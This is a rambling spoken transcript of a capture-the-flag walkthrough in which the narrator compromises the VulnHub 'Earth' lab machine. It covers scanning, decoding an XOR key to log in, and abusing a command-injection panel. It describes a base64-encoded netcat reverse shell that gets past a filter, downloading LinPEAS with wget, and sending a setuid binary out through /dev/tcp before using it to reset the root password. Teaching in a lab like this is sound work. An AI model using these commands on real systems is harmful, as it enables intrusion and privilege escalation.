Hi everyone, good morning, good afternoon, good evening. So today I'm going to be doing a pen test of a box called Earth. So Earth is a series of boxes for planets or penetration testing planets. So without further ado, we have to start. So I downloaded this machine on VulnHub, and it's one of the easiest machines in the series of planets. So first things first, like you always know me, you want to split the screen. I want to split the screen and run as root. It should be same sudo. So the first thing we're gonna do here is discover. We're going to try and discover the device on the network. Dash I for interface Ethernet 0 and range 192.168.128.128/24. So you might be wondering why I did this. So if you come here and say IPA, you're gonna note that we've got some interface here. You got the loopback, we got the Ethernet 0, we got the Docker. So as for me, my network is on Ethernet 0. That's the local area network I created with my virtual. That's my virtual network. And here is the init and the range, something like that. So that's why I did that. So right now it's going to look for the device on the network. Well, you actually look right here, or maybe let me do if config. If you look right here, you see that my IP address is 128, and the possible IP address that is very close to me is 130 right here. So this is the possible computer that I'm targeting. So I'm going to copy the selection. Here I'm going to clear the screen, and with that I'm going to do an nmap scan. Nmap minus T4 for speed, minus A, minus variables. I want all the ports and all the services of this machine. So what it's going to do, nmap is going to be looking for the ports. Okay, we say we have located the address of the computer or the device we are looking for, and now I want to know, what is the computer doing in that network? What processes are running? What doors are open for us to access? If there are any windows, and we can see if there are any broken windows, maybe we can peep in and maybe we can put a stick and draw whatever we want to take. I don't know whatever concept you're gonna take, and that's the way I took it when I was studying certified ethical hacking. Yeah, though I'm not certified. Okay, so that's it. And it's not bad that you go and check whether the device is on a network, like it's running uh say like a web server or a web application, but most of them do. And so we are seeing it's got put that and that and that. And look, oh man, that's a bad request. 400. Oh man, that's not good. So we're gonna view the page source and see maybe there's something in the page source. Yeah, there's nothing in the page source. Okay, done now. We are just hoping for the best for this nmap scan. Maybe we're gonna get a few things, or maybe there's some, I don't know. No, let's just wait. But can I just wait? We must wait doing something, I guess. Oh, that's the percentage of it. So maybe we can do go faster dir, and this the URL http on 9168.198.130 word list user share word list derp common dot text. Well, what GoBuster does, it brute forces some directories or some pages on a web server. Yeah, and we were unlucky though, but at least we just wasted time, right? And now we got our nmap scan results up and running. I know you've been waiting for them and you've been scared that maybe you're gonna be caught positive or negative, I don't know, whatever. And here are the results. So the first thing is the paternity of okay, so it's like we got port 22, that's SSH secure shell. We got port 80, we got port 443. Wow, that's nice. And we got a DNS, like a domain name server. That's so okay, I get. So it's supposed to be, we got DNS for earth.local. This one should be, supposedly is for port 80, and the other one right here is for port 443. Now, what can we do with this? We can actually put it in our host file. So we can actually nano etc host, and then we take the domain like that. We do this v, and then we can put earth.local earth.local local like that, and we can also put the same. Oh man, come on. And we're gonna put terra tests earth.local like that, and then we're gonna close that. And now what you're gonna do right here is you're going to go to the corresponding sites. So we have http earth.local, and we got another one right here which is secure https terra test earth.local. So now, because we just resolved that DNS, now you can see, oh, say what? There's a risk ahead. No, man. You know what? Oh, they're saying use an invalid security certificate. Now we're gonna accept the risk. You know, cybersecurity is all about risking, especially ethical hacking is all about risking. So what we're gonna do right here is we're gonna brute force now. We're gonna brute force so we're gonna get some, yeah. We're gonna get some. We're gonna brute force right here the pages in this side. Well, as you can see, my computer is running 100% of its resources. Why? Because yeah, it's an oldie but a goodie, and that's how I learned cybersecurity from high school to what just yeah. But we would have utilized the web suite to actually navigate and see, but that same we can actually do it here in the terminal. So we're gonna do go buster. We want to see the directories in this URL and use this word list, which is a user share word lists derb. Well, you have to note that in derb we got a lot of word lists. You can just press tab, all those, but we really like using the common.text, something like that, and then we're gonna press enter. So now it's going to brute force and see what's going on this website. And also, what do we have? So, well, the good thing is we got these services up and running, so you can actually search for any of these services and look for, if you're online, you can actually look for some vulnerabilities. Maybe you can actually see an exploit somewhere, somehow, that you can actually utilize and get into it. So, okay, so here we are, we got an admin panel running right there. And the same we are going to do to terror test. The same brute force, we're gonna do it to terror test. Alright, let me just go ahead and copy this. Copy. And then we're gonna paste it. And we say the word list is always user share word list derb. Also, I got another word list in debbuster, but I really love using the one in deb because it's small and straight to the point, like small and precise. Deb, it does the work quite good. The text. I'm gonna press it. So what did you say? Cobus is unable to communicate to HTTPS test local failed to verify certificate signed by a known authority. Oh, but does test have an HTTP? I doubt. Just check it. Wow, it has got an HTTP, but we are not interested in its HTTP. So what we're gonna do is we're just gonna clear this, right? And then we're just gonna be like derb. Then we're gonna put it. So that one is gonna force it like that. So nice. So let's just see the admin panel, which is right here. Slash admin. Oh, admin command 2. You are not logged in. Please log in. And just gonna click that. Oh, we gotta log in. Nice, nice, nice. And what we have here in HTTPS, we got an index.html. We got CGI bin. Can we actually access that CGI bin? I'm not sure. Let's just save it. Let's just give it a try. You know, cybersecurity is all about try. I was with this man. His name is Mr. Kanyandura. So he gave me his phone and he said, "Hey son," and I said, "Yeah, Dad." And I said, "My phone is malfunctioning. I want you to take a look at it." And I said, "Yeah, I'm gonna try." And I was like, "Yeah, I know you were gonna try because you are an IT guy, and most IT people never say they're gonna do it." They said they're gonna try, and I said, yeah, it's because of the uncertainty. You can say that this is easy, and then you find it's something that is harder than you thought. I said, yeah, that's good. and, and right now I'm just thinking about it because I just say that I'm just gonna try to see if this page is gonna work. So now let's see the robots.txt. Wow, we got all these entries. So what we are seeing here is that we got the robot.txt and we got some test notes. So we can use any of these extensions here to actually access this. So let's try that. So we're gonna take testing notes. Why didn't we see that when we did our brute force? I guess if you understand how brute force works, you actually know why we didn't see that texting notes. The XML like that. Oh, nice. Dot text. There you go. So they're saying testing secure messaging system notes use SOA encryption as algorithm should be safe to as used in RSA. Authors confirmed they have received our message. Test data was used to test encryption. Wow, we got something like test data. Duplicate the tape. And Taylor was used as a username for admin. What do we have? Oh, nice. Let's just have test data to text. Copy that. Test data to text. Paste and go. Oh no, I didn't mean that. Uh, why are you treating me this way? There you go. So they told us that there is this encryption method called SOA. Encryption method. And what encryption method is? What encryption method is this one? Tell me. Because we are seeing that there are these messages that they have been sending to Earth, right? What encryption method is this? Isn't this a hexadecimal? Yeah, something like a hex. So what we're gonna do right here is we're gonna do that. Yeah, we're gonna do that. And here is the test data. Wow, man, tell me what are we gonna do about this? Oh, help me out, help me, Lord, I feel Okay, so let's just have it. So with me is what we call a cyber chef right here. So I just downloaded it, the version 10.18.2. I guess that's the latest one. So there you go. We're just gonna open it. Yeah. So that's the cyber chef. So what cyber chef does is it decrypts some encryptions. Yeah, that's what it does. So we just gonna cook some. Yeah, we're gonna cook some food with Cyber Chef. So it's running offline, right? I'm actually offline. I don't have internet access. Yeah, but it's good that I can actually do the pen test, isn't it? Yeah, it's good. You know, when you love something, you always find a way to do it. Oh, so the Cyber Chef is open. So here's the Terra dust. So according to radiometric dating, estimation and other evidence, Earth formed Earth formed over 4.5 billion years ago. Within the first billion years of the Earth history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and later aerobic organisms, some geological evidence indicates that life may have arisen as early as 4.1 billion years ago. Wow, I didn't know. Okay, so what we are going to do here is we got the server chef. Do I need to download the server chef? I already downloaded. Ah man, come on, don't be like that. Okay, so look at it. Look at it here. Okay, here we got these this algorithm right here. This encryption, right? So this is a hexadecimal, I suppose. And what we're gonna do is we're gonna come here in CyberChef because we want to translate this from hex. So we're gonna just drag it and leave it there from hex, and then we're told something in the message that they use a SOA encryption should as the algorithm should be used same as in RSA. So we're gonna take it. We're gonna take SOA encryption. We're gonna search for it, and we're gonna take it and we're gonna paste it right there. So the schema is standard. Should it be standard? And since we got already from hexadecimal, this is in UTF-8 was written in the way that you can read. So what we're gonna do right here is put the key that we found, which was written here in the test data, right? And we're gonna copy it, and what we're gonna do is paste it here like that. Now we're gonna come here on Earth and take these messages, copy it, and we're gonna paste it right in the input, paste, and it's gonna automatically, you say it should be automatic, it's gonna bake it. Oh, this data is gibberish. There's nothing like that on Earth. We don't read such messages on Earth, man. We don't we don't do that. We don't do that. Okay, and we got another one right here. Let's just take it and let's paste it. Let's see. This is gibberish too, bruh. We don't do that here on Earth. We don't we don't do that. We don't read such messages. They say that. Look right here. They say that where is it? Earth has confirmed they have received or sent messages. Yeah, they received the message, but you know what? Communication is a two-way thing, and once the receiver has understood the message, then the communication is complete. So possibly we don't read that on Earth. Let's see this one. Oh man, this is the H language. That's the language that we use here on Earth. What were they saying? They said Earth climate change bad for humans. Oh, nice. So we just have to copy that. And thank you so much. So here in that we were told that Terra was used as the username for admin portal. And right here we are in the admin portal as you can see. So we're gonna try and log in. Terra. Terra. That name I saw it on the cartoon. Is it what is it, AJ? Isn't it Teen Titans? Yeah, it's Teen Titans. And then we're gonna paste it. Let's give it a shot. And I really don't like saving my passwords. Oh, we just logged in that. Oh, now that's done. that's done. So wow, thank you. I know, when you are doing a real pen test, you would try things here. Maybe gonna be like you're gonna try some scripting thing, like to see if there's a JavaScript injection. Cross-site scripting, I mean, script. You're gonna just try that and just say maybe something like alert. What is this? And what's the message key? We don't know. It's just gonna take it. And you wanna send it and see what happened. Failed request about it, blah blah blah. But that's sort of what we are doing here. It's just that I did this box, so yeah, I tried all that stuff on my own, but I didn't even know a lot of things, and it taught me a lot of things. So how do we send our monthly keys secure? Should we change the keys quickly? I need to test different key lengths to protect against brute force. How long should the key be? Need to improve the interface. Yeah, this is what you should do. But right now we are focusing on the fact that we are now inside that main panel. Now they say, welcome Terra, run your command line command on Earth messaging machine. Use with K. You can actually put some commands. Let's see. So if I do if config. Whoa, man, this is way much risky than I thought. Okay, so what can we do right here? We can actually inject some commands, right? Can we read the shadow? So let's see. Our ID. Oh, we're running as Apache, and what else can we want to find? We can want to try as ls. Wow, we can actually list things. It's interesting. How about cat etc password. Wow. And you know what this does? This helps us to see the users that we got in here. We got some earth, we got a user called earth supposedly because we got a home earth, and then we got, oh, you can actually run this page. We got this user called earth right here, and we got a user called Apache right there. Okay, that's nice. That's nice. Okay, how about the shadow? Can we actually read the shadow? Wait. Let's see. Is ls etc, and then we're gonna grab shadow. It's what? This is the spelling for shadow. Okay, nice. Let's see. Maybe we can access that. Shadow. We can't actually see the output. But what about the host? Okay, so that's it. That's it. Nice. So what we're gonna try here is we're gonna try to get. Do you have some netkit? Which netkit? We got netkit. What do you have some Python? We got some Python right there and running. So we're gonna try to get a reverse shell in netkit, right? So I think the time is up. You exit. I want you to exit. I want you to exit. And I want you to clear. So what we're gonna do right here is we're gonna say netcat minus lnvp. We want to open port 444. So we are listening for any connection that's trying to connect to us on this port. And right here I'm going to say netcat what's the IP address? 192.168.198.128. So we want to see if netcat is gonna do anything. Remote connections are forbidden. Dang. Okay, what if we just ping? Okay, maybe netcat didn't work. We want to try and ping. That's the same thing. So what can we do? What can we do? Yeah, there's a restriction right there. But we don't end there, man. We don't do that. So we're gonna try to change this into base 64. We're gonna say echo, right? And then we're gonna take this command. We want to see if this will bypass or this will work. Okay, take this one. And we're gonna turn it to base 64. And what we're gonna do is we're gonna say again. So what happened is this. We say, do you want you to print this, but we want you to, after you print this, we want you to turn it into base, give the result in base 64. So what we're gonna do right here is we're gonna say, that's right. We're gonna say echo that. Gonna paste that. And we're going to say base 64 -d. That's for decrypt. And then we want to run it in bash. So what this command does, or the thing is, it's gonna run the command from left to right. Should I say? So it's gonna say bash. I want you to run this command. This command in base. You have to first decrypt it from base 64. So let's try that. Let's just first check if it works. Alright, we can now ping that. Nice. So right here, let's see if it's gonna print. It's gonna ping. So the thing, if you want to know if you did, you just see this looping up and looping and looping. Okay, maybe let's just do it so that you can actually connect to a netkit. Okay, No, that's not what I want. Let's put that port like 4444. Okay, this 64. So we got that. We got it? Yeah, we got it like that. Then we're gonna copy. So we're gonna put, I don't know why this array is not working. Yeah, my PC is very old. My keys, not all keys are working. But at least we are doing a pen test. Best 64 dash decrypt. Want to run it. Splash. Oh, shit, it's not known. Okay, no problem. Let's just create our payload in what? Let's just create one like netcat, the one for netcat. Okay, so it's gonna be echo netcat minus execute. Want a netcat to execute that. Want it to execute in bash like that. And we want it to connect on 192.168.128.128 on port that 44444, and we want to convert it to this 64 like that. Thanks for that. With that in mind, let's also do this just by medkit, just like 192.168.130 on put 444 like that. We want also to turn this into base 64. Now we want to change that command. We're gonna use this. We're gonna take this one. Let's take this one first, so that you can see whether it can connect. Whether the same thing we did with ping will also work with the netcat. This 64 dash decrypt, and we want to run into the splash. Let's first test it here. Oh, I just put a dash. Man, these things are very stressing and very boring. Or maybe let's just open mousepad. Okay, let's just. But hey, my computer's resources, I'm so. Okay, let's. Mousepad. Yeah, hopefully it's not gonna crash. Let's just wait a few minutes for that. Okay, nice. So instead of me typing that and that and that and that, I'm just gonna check this as it is, like that. Then I'm gonna copy the selection, come to mousepad and paste it, then remove that dash here. Then I'm just gonna copy it again. And then just gonna paste it like that. Good. And right now we're gonna take this. Where is it? This one. Just gonna copy it. Gonna paste it right here. And then we're gonna take this basic step for encryption. Copy it. That's why it's actually good to start by testing your weapons before you go to the field. See, I would have been stressing why this code didn't run if I ever tried to run it. Copy. No root to host. Supposed to be 128. Oh man, like for real. Okay, nice. I'm just sort of burdening you guys, but my IP address is 128. So let's do that again. Copy and paste. And then I will check that. Was wanted to connect to my PC, right? That's what we wanted to do. So paste. Oh. Wanted to connect to my PC. After a long struggle. Okay, nice. So now if I can just say hi, hello, you gotta see that. So now this is the same concept that you're gonna use when we are going to try to make it connect right here. So this command, I guess, is actually perfect as it is. This PM what dash 128 like that. So we're gonna take this one, gonna copy it, and we're gonna do the same command right here, and we're gonna create that. Let's just replace this and see if ever this will work. If ever this will work, is it gonna work? I'm sure. There you go. And you should be able to run some commands right there. You see, this is the thing that you want exactly. So you're gonna just stop this process, clear the screen, and then we're gonna listen. So I'm gonna take that command and go to Terra blah blah blah, and gonna paste it here and then run the command. And now it's running a process. You're gonna see that we have been connected to 130, and right now we can actually run commands like that. I remember when we searched, when we did which is Python, we saw that there is a Python running in there. So I'm gonna do this. I'm gonna spawn a shell in Python. So I'm gonna be like Python run this command for me. That's import pty and the PTY should spawn this so-called bin bash, because we want a shell. We want to spawn a shell, bin bash. I mean, I should have put some code for it. So it's / bin bash, bin bash, and there you go. And we're gonna close this. Did you manage to? Man, look, I just said Python. This is not good. You see those hackers in TV, they'll be like, all typing. But me, I'm actually taking my time, but yo, it's quite hard. It's not hard as such, but I made some mistakes. There we go. Now we just gotta share and I can actually clear my screen. I can't clear my screen? Ah, okay. So this is the way that I did it, like this the manual way, but with me here I got a plugin right here in my browser called Hack2s. So you can actually open it. You wanna see that it has got those, you see that reverse shell, we can actually get a reverse shell. And we used Netcat, isn't it? That's a PHP shell. So you can see that that I did, yeah, you see this Netcat thing right there. And we can actually spawn a shell in PowerShell, and you can actually spawn a shell in Python. But I use this Netcat thing. Okay, what you want to do is you want to spawn to get a TTY spawn shell. So we want to do it with Python, and this is the command that I ran earlier, the Python word. So the steps to stabilize mine. So I'm gonna do this. This is the command that's the first step. And then step 2, we're gonna take that. I'm just gonna copy it. And I'm just gonna paste the clipboard like that. Now you see, and you can add some more features and stuff. So now we are now in the machine. Let's just do pwd and who am I? I want to see I'm Apache, and what's my ID right there. So that's it, man. We just go into the machine, and that's awesome. But we don't end there. But for a beginner, from a beginner perspective, man, you just did the job well done. And if it were a pen test, you just proved your organization that somebody can actually get into your system and do 1, 2, 3 right now. So remember, we have those users that we saw earlier. We got the user called Earth. Really, we do have one. So what we're gonna do now is I'm gonna exit here. I guess you actually know what I want to do. Yeah. I'm going to use LinPeas to scan the machine from the machine's perspective. So I'm going to look for LinPeas like that. And I'm going to the temporary folder. That's where I'm going. And I'm going to run Python. I'm going to start a server. Python. But as module is http.server on port 80, and it's gonna start a server. And what I'm gonna do is I'm gonna get wget http 192.168.198.1 28 slash leanpiece.sh, and I just downloaded it. So I'm gonna clear and give it some privileges. chmod plus execute lean piece.sh, and I want you to run lean piece.sh like that. You just have to, yeah. I thank you. I know what you're feeling right now. You're feeling very jiggy. So I explained this. So here is the lean piece thing. When you see a red or yellow, it means that this is an attack vector that can make 95%. And if you see a red one, you should just take a look at it. If it's a light green, it's a user control. The blue one, these are users without a console. The green, the common things like users groups. The light one, that's your username. So now let's just dive into it. So this limpers can discover Ospla. So here the pseudo version, here's the path, date, and this is where we just have to look at this, the directory here, right? In the environment and executing Linux exploit suggested. So here it's just suggesting some exploits for us. Yeah, one or two can actually work. So you just have to look at them and try to use advantage of one. Just that I don't have internet access, you can actually just click and see how the exploit works and how you can use it. And it's still loading. Okay, nice. I know my PC is very, look, 100%. It's, yeah. So it's actually doing things, a lot of them. But at the same time, we can actually do that. Yeah, that's why I love this too. Let me just actually pin it to the task. And the other one, that's Opalizer. Yeah, I would do maybe another tutorial with Opalizer coming into action. Opalizer helps you to identify what's running on the web server, like what scripts are there and stuff. So you see, you can actually, we say here we got for reverse shell, and here we got for PHP reverse shell, and here is to spawn a Python shell, and then here are some Linux useful command for penetration testing. So here are some suite commands. So we'll be looking for some permissions, right here. So here are some suite permissions where you can get some exploits possibly, and what version of the system is running. Like these are the commands that when you just get foothold, I don't know, of the computer you've been pen testing, you want to know all these details. They are very useful. The kernel version, maybe you can get an exploit, the environmental variables, the services running, all this, the cron tab thing. So what LeanPiece does, it does most of these things for you. It just do them for you. So yes, maybe you were penetesting an Active Directory. Here's some useful command that you can use and that you can run. And maybe for file transfer, local, this is LFI, local something. These are transfer methods. So maybe you want to transfer some things, yeah, you can just do it. Maybe you want to use Netcat to upload, I don't know. This thing, you just have to look at it. It's a very useful tool. Local file inclusions, directory of this, there are a lot of things. Okay, let's go back to here. Yeah, it has been looking at that, and let's go down. And there you go. So here some processes and some clones. You can actually analyze all this data. Yeah, Okay, those ones are for root. Yes, some cron jobs. There are no jobs that are running. Oh, there's that one for weekly, and this one for mail too. Okay, nice. We have got system timers, analyzing timer file sockets. Okay, let me look for some sweet binaries. I really love checking at sweet binaries because most of the time that's where we can actually get an advantage. And we are looking for that yellow. You see here that I think I told you earlier when we did that, we saw that there's a user code earth and okay, and a user code root. Oh, nice. Useful software, yeah, all these. Okay, here is the firewall HTML. Okay, this is quite interesting, isn't it? Files with interesting permissions. Wow, these are the files with interesting permissions. And look at this. We got okay, that. Oh, we got this reset root, and it's an unknown sweet binary. Wow. Okay, and we got some grab to set boot flag. This is also an unknown. Oh, wow. So let's just check that. Let's just do you have a yellow right here? Wait, let me just first copy that. Okay, just first copy the selection. Oh, do you have some yellow here? Oh, we got some backup files, right? Good. The passwords and credentials. Yeah, nice. Good. Yo, okay. So what we're gonna try is we're gonna run that reset root. Is a being reset root. Checking if reset root triggers are present. Reset failed. Oh, what if we can just get, or let's just download the file and have it to our computer. So let me just clear this. So it's gonna be netcat minus lnvp on, now we are using port 444, right? So we want to use maybe 333, and then we want to write these files to a file called reset root. So what is going to be happening is that okay, I'm sorry for that. Oh man, it's forcing me to be in root. Sudo netcat lnvp 3333, right? And you want it to write to reset root. What? Or maybe the directory I am. So now what's happening is that it's gonna be listening, like netcat is going to be listening on port 333, and whatever it's going to receive, whether the connection, whether the file is what, is gonna put it or export it to a file that is going to name reset root. So now let's go here, and what we're gonna do is we're gonna cat that cat is a being reset root. and we're gonna put it to dev TCP. We put the IP address 192.168.198.128. Yeah, and then we're gonna put slash, and that's gonna be the port 3333, like that. So let's listen to this connection, and let's just connection refused. Is that true? 198.168.128.128.33333. Did I get anything wrong right here? No, I didn't get anything wrong. Why did the connection get refused? Oh, host name, look up failure resources, temporarily unavailable. Okay, let's just have this. Now it's listening. Now that's good. Good one. Let's just try it. Okay. Oh man, I didn't expect it to be this way. So what is gonna happen is that it's gonna read the files, and the files it's gonna read, it's not gonna display it here, it's gonna just send it here. And that's why we just received it right here. So now we got it. So it's gonna be like we want to clear and we want to read the file. So it's gonna be cat reset root. Oh, you can actually read it. So what are you gonna do? Okay, we're gonna try to trigger the present to if there are no triggers, but we can actually trace and see what's going on in this thing, right? So we're gonna use a tool called ltrace. But first you have to give it some privileges. So it's gonna be chmod plus x reset root, and then we're gonna be like ltrace reset root. Bang. So now here the thing that we were tracing for, the triggers. So it's saying, do you have access to dev this? Oh, so let's just put these files and see. Copy selection. So you're gonna just touch it up. Touch one. I'm sorry. That's gonna be touch again. Yeah, there's a lot of touching right here. And another touch. Why are we making these files? Because that file, the executable wants to see these files so that it can run. So now let's just clear the screen and try to run reset root. Checking if reset triggers are present, and reset triggers are present, resetting root password to dang, we just reset the password. Now let's see if that worked here, right? It's gonna be su root. Oh, let me just put my PC on charger real quick. Oh, I'm sorry for that. If you're wearing headphones or what, I'm sorry. So we're gonna change from Apache to root, and we're gonna put the password. What's the password? Is it And there we are, root, earth, and we're in the temporal folder. Okay, let's just see. Who am I? I'm root, and what's my ID? Root, man. So we just took over the whole machine right now. It's now our machine. It's our machine, yeah, for real. So yeah, I'm not looking for the flags though. Yeah, forgive me for that. I'm not looking for the flag, but I don't know if you want us to okay, let's just cd dot, and we're gonna be like cd slash uh yeah, I don't know where the flag is. When I'm doing these things, I just do it as like I'm doing a real penetration test. Was yeah, in a real world scenario, you won't be looking for flags. You won't. But flags are also useful. Why? Because they help you to try all the possible combinations. Because you are looking for this one flag. But I guess let's just go to cd root. And there is the root flag. So I'm gonna clear and get root that flag dot text. And there. Congratulations on completing Earth. If you have any feedback, please contact me at that or using a proton mail. Dang. Root flag, that's the root flag, and bang. And this is a nice looking Earth. And I'm proudly African. We are somewhere here in Zimbabwe, somewhere here. So guys, yeah, that was me penetrating into Earth, and it was quite a nice time with you guys. Thank you for taking your time to watch me mad food, and today is an April Fool's Day and something like that. So thank you guys and stay safe. Take care.